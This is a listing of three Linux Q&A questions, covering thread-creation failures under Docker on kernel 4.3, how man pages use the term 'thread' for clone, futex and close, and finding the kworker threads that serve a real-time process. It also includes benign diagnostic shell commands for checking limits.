Creating threads fails with “Resource temporarily unavailable” with 4.3 kernel

linux docker limit fork thread

I am running a docker server on Arch Linux (kernel 4.3.3-2) with several containers. Since my last reboot, both the docker server and random programs within the containers crash with a message about not being able to create a thread, or (less often) to fork. The specific error message is different depending on the program, but most of them seem to mention the specific error Resource temporarily unavailable. See at the end of this post for some example error messages.

Now there are plenty of people who have had this error message, and plenty of responses to them. What’s really frustrating is that everyone seems to be speculating how the issue could be resolved, but no one seems to point out how to _identify_ which of the many possible causes for the problem is present.

I have collected these 5 possible causes for the error and how to verify that they are not present on my system:

1. There is a system-wide limit on the number of threads configured in /proc/sys/kernel/threads-max ([source](https://stackoverflow.com/a/22570554/242365)) . In my case this is set to 60613.
2. Every thread needs its own stack space. The stack size limit is configured using ulimit -s ([source](https://stackoverflow.com/a/9211891/242365)). The limit for my shell used to be 8192, but I have increased it by putting * soft stack 32768 into /etc/security/limits.conf, so ulimit -s now returns 32768. I have also increased it for the docker process by putting LimitSTACK=33554432 into /etc/systemd/system/docker.service ([source](https://sskaje.me/systemd-ulimit/)), and I verified that the limit applies by looking into /proc/<pid>/limits and by running ulimit -s inside a docker container.
3. Every thread takes some memory. A virtual memory limit is configured using ulimit -v. On my system it is set to unlimited, and 80% of my 3 GB of memory are free.
4. There is a limit on the number of processes using ulimit -u. Threads count as processes in this case ([source](https://superuser.com/a/568943/23403)) . On my system, the limit is set to 30306, and for the docker daemon and inside docker containers, the limit is 1048576. The number of currently running threads can be found out by running ls -1d /proc/*/task/* | wc -l or by running ps -elfT | wc -l ([source](http://rudametw.github.io/blog/posts/2014.04.10/not-enough-threads.html)) . On my system they are between 700 and 800.
5. There is a limit on the number of open files, which according to some [source](http://dimitrik.free.fr/blog/archives/2010/11/mysql-performance-hitting-error-cant-create-a-new-thread-errno-11-on-a-high-number-of-connections.html)s  is also relevant when creating threads. The limit is configured using ulimit -n. On my system and inside docker, the limit is set to 1048576. The number of open files can be found out using lsof | wc -l ([source](http://www.cyberciti.biz/tips/linux-procfs-file-descriptors.html)) , on my system it is about 30000.
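The five checks above can be gathered into one bash sketch (invented function name) and run both on the host and inside a container. It only reports the values the list mentions, so it cannot reveal any other limit the kernel might apply.

```shell
#!/usr/bin/env bash
# Print the limits and counts from the five checks above in one place.
# Optional $1: a PID whose /proc/<pid>/limits should also be shown.
thread_limit_report() {
    local -a tasks=(/proc/[0-9]*/task/[0-9]*)
    echo "threads-max:        $(< /proc/sys/kernel/threads-max)"
    echo "ulimit -s (KiB):    $(ulimit -s)"
    echo "ulimit -v (KiB):    $(ulimit -v)"
    echo "ulimit -u:          $(ulimit -u)"
    echo "ulimit -n:          $(ulimit -n)"
    # Roughly the count from `ls -1d /proc/*/task/* | wc -l`, without ls.
    echo "threads running:    ${#tasks[@]}"
    if [ -n "${1:-}" ] && [ -r "/proc/$1/limits" ]; then
        echo "limits of PID $1:"
        grep -E '^Max (stack size|address space|processes|open files)' "/proc/$1/limits"
    fi
}
```

For example, `thread_limit_report "$(pidof dockerd)"` on the host would add the daemon's own limits (assuming the daemon binary is named `dockerd` and a single instance is running).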

It looks like before the last reboot I was running kernel 4.2.5-1, now I’m running 4.3.3-2. Downgrading to 4.2.5-1 fixes all the problems. Other posts mentioning the problem are [this](https://lkml.org/lkml/2015/11/24/203)  and [this](https://bbs.archlinux.org/viewtopic.php?pid=1593364) . I have opened a [bug report for Arch Linux](https://bugs.archlinux.org/task/47662) .

What has changed in the kernel that could be causing this?

----

Here are some example error messages:

    Crash dump was written to: erl_crash.dump
    Failed to create aux thread
 

    Jan 07 14:37:25 edeltraud docker: runtime/cgo: pthread_create failed: Resource temporarily unavailable
 

    dpkg: unrecoverable fatal error, aborting:
     fork failed: Resource temporarily unavailable
    E: Sub-process /usr/bin/dpkg returned an error code (2)
 

    test -z "/usr/include" || /usr/sbin/mkdir -p "/tmp/lib32-popt/pkg/lib32-popt/usr/include"
    /bin/sh: fork: retry: Resource temporarily unavailable
     /usr/bin/install -c -m 644 popt.h '/tmp/lib32-popt/pkg/lib32-popt/usr/include'
    test -z "/usr/share/man/man3" || /usr/sbin/mkdir -p "/tmp/lib32-popt/pkg/lib32-popt/usr/share/man/man3"
    /bin/sh: fork: retry: Resource temporarily unavailable
    /bin/sh: fork: retry: No child processes
    /bin/sh: fork: retry: Resource temporarily unavailable
    /bin/sh: fork: retry: No child processes
    /bin/sh: fork: retry: No child processes
    /bin/sh: fork: retry: Resource temporarily unavailable
    /bin/sh: fork: retry: Resource temporarily unavailable
    /bin/sh: fork: retry: No child processes
    /bin/sh: fork: Resource temporarily unavailable
    /bin/sh: fork: Resource temporarily unavailable
    make: *** [install-man3] Error 254
 

    Jan 07 11:04:39 edeltraud docker: time="2016-01-07T11:04:39.986684617+01:00" level=error msg="Error running container:  System error: fork/exec /proc/self/exe: resource temporarily unavailable"
 

    [Wed Jan 06 23:20:33.701287 2016] [mpm_event:alert] [pid 217:tid 140325422335744] (11)Resource temporarily unavailable: apr_thread_create: unable to create worker thread
                                

cdauth (1487 rep)

Jan 7, 2016, 03:16 PM • Last activity: Aug 17, 2023, 10:48 AM

1 votes

1 answers

358 views

Does the definition of a thread in Linux depend on a system call?

linux thread


## Clone

In the manual page for the clone()/clone3() system call, I find:


> CLONE_THREAD (since Linux 2.4.0)
> 
> If CLONE_THREAD is set, the child is placed in the same thread group as the calling process. To make the remainder of the discussion of CLONE_THREAD more readable, the term "thread" is used to refer to the processes within a thread group.

So, as I understand it, from clone()'s perspective, a thread is a task that was created with the CLONE_THREAD flag set (and, thus, ended up in the same thread group as the caller).

## Futex

But looking at, for instance, the manual page for futex(), I find:


> FUTEX_PRIVATE_FLAG (since Linux 2.6.22)
> 
> This option bit can be employed with all futex operations. It tells the kernel that the futex is process-private and not shared with another process (i.e., it is being used for synchronization only between threads of the same process). This allows the kernel to make some additional performance optimizations.

This seems related to clone()'s definition, but not quite. When a thread (as in clone) is created (that is, when the CLONE_THREAD flag is specified), the tasks also _have to_ share their VM. However, it is possible to create two tasks that are not threads (as in clone) but still share their VM (by specifying just CLONE_VM). Judging by the [FUTEX : new PRIVATE futexes](https://lwn.net/Articles/229668/) article/patch, the optimization behind private futexes is that the virtual address of the futex word is used rather than the physical one, so one could probably use private futexes in tasks created with CLONE_VM... but the futex() man page forbids that.

That is not a critical issue, though: the manual imposes a (seemingly unnecessary) restriction, but it doesn't break anything. So here is a more interesting example.

## Close

From the manual for the close() system call:


> Furthermore, consider the following scenario where two threads are performing operations on the same file descriptor:
> 
> (1) One thread is blocked in an I/O system call on the file descriptor. For example, it is trying to write(2) to a pipe that is already full, or trying to read(2) from a stream socket which currently has no available data.
> 
> (2) Another thread closes the file descriptor.
> 
> The behavior in this situation varies across systems.

Clearly, it is assumed here that the two tasks share a file descriptor table, but being threads (as in clone) is neither necessary nor sufficient to claim they do!

If a task is created with CLONE_THREAD|...|CLONE_FILES, it's all good. But if it's created with just CLONE_THREAD|... (which is allowed), the two threads (as in clone) do not share a file descriptor table, while tasks cloned with ...|CLONE_FILES but without CLONE_THREAD are _not_ threads yet _do_ share one!

## Question

First of all, is this (at least the close() example) a bug in the manual? Is it because it was written before the clone() system call was designed? Or am I missing something?

In general: when using a particular system call whose manual uses the term "thread", how do I tell what's implied?

In particular (assuming I want to write code that will work on future kernel versions): would it be OK to use private futexes in tasks that share VM but are not threads (as in clone)? Would it be thread-safe to call close() in threads (as in clone) that do _not_ share a file descriptor table, as common sense suggests?
                                

Kolay.Ne (170 rep)

Jul 22, 2023, 08:57 AM • Last activity: Jul 22, 2023, 08:22 PM

0 votes

2 answers

415 views

How to find PID of all processes related to a given process?

process real-time thread priority


How can I go about finding the PID or other information about a process that is doing the work of another process? I'm talking about kworker threads, for example, or any other threads/processes that are doing work within the kernel for another process. My dilemma is that I have a real-time scheduled process (SCHED_FIFO) running at sched prio 99, with CPU affinity bound to CPU 0, but when I inject CPU stress on my machine, I notice that my important rt process is not able to preempt the other, non-important processes. I'm thinking this may be because the kworker threads that do work for this important process do not inherit the priority that the main process has, even though I specify the -a option in taskset and chrt. My current idea is to manually taskset and chrt the kworker threads so they don't get preempted by other, non-rt processes.

stochasticlover1 (9 rep)

Jul 17, 2023, 05:08 PM • Last activity: Jul 19, 2023, 07:42 AM
